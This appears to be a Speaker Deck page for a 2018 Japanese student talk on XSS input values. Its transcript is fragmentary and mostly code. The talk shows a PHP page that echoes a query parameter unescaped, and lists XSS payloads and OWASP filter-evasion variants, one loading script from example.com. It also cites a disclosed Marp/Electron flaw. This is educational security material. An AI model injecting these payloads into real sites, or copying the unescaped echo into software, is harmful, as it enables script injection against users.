Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.3k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
84
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
180
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
300
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
690
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
320
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
120
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
140
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
250
ブレース展開のススメ
tomoyk
0
430
Other Decks in Technology
See All in Technology
Azure犬駆動開発の記録/GlobalAzureFukuoka2024_20240420
nina01
1
220
Meta Quest 3 で動く桜マシマシ WebXR アプリを IBM Cloud Code Engine と Babylon.js で作った話
1ftseabass
PRO
0
120
DevOpsメトリクスとアウトカムの接続にトライ!開発プロセスを通して計測できるメトリクスの活用方法
ham0215
2
240
APIファーストなプロダクトマネジメントの実践 〜SaaSus Platformでの例〜 / "Practicing API-First Product Management - An Example with SaaSus Platform
oztick139
0
110
AWSに詳しくない人でも始められるコスト最適化ガイド
yuhta28
1
250
どうするコスト最適化のトレードオフ
tetsuyaooooo
1
530
ServiceNow Knowledge 24の歩き方 EYストラテジー・アンド・コンサルティング
manarobot
0
200
Building a RAG-powered AI chat app with Python and VS Code
pamelafox
0
100
[新卒向け研修資料] テスト文字列に「うんこ」と入れるな(2024年版)
infiniteloop_inc
4
16k
Azure Container Apps + Bicep 〜 こんな感じで運用しています
kaz29
2
480
オーナーシップを持つ領域を明確にする
konifar
13
3.2k
データベース02: データベースの概念
trycycle
0
160
Featured
See All Featured
Music & Morning Musume
bryan
41
5.6k
Large-scale JavaScript Application Architecture
addyosmani
504
110k
The MySQL Ecosystem @ GitHub 2015
samlambert
243
12k
How to name files
jennybc
65
93k
Designing Experiences People Love
moore
136
23k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
30
6k
How GitHub (no longer) Works
holman
304
140k
Building Applications with DynamoDB
mza
88
5.6k
Practical Orchestrator
shlominoach
182
9.7k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
The Cult of Friendly URLs
andyhume
74
5.7k
Making the Leap to Tech Lead
cromwellryan
124
8.5k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron
tomoyk
nina01
1ftseabass
ham0215
oztick139
yuhta28
tetsuyaooooo
manarobot
pamelafox
infiniteloop_inc
kaz29
konifar
trycycle
bryan
addyosmani
samlambert
jennybc
moore
eileencodes
holman
mza
shlominoach
keithpitt
andyhume
cromwellryan
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_3.jpg){kind=link}
![... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_4.jpg){kind=link}
![[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_13.jpg){kind=link}
![[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_14.jpg){kind=link}
![[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )](https://files.speakerdeck.com/presentations/997e2c05a6024002b93112c5b6eff5c4/slide_15.jpg){kind=link}
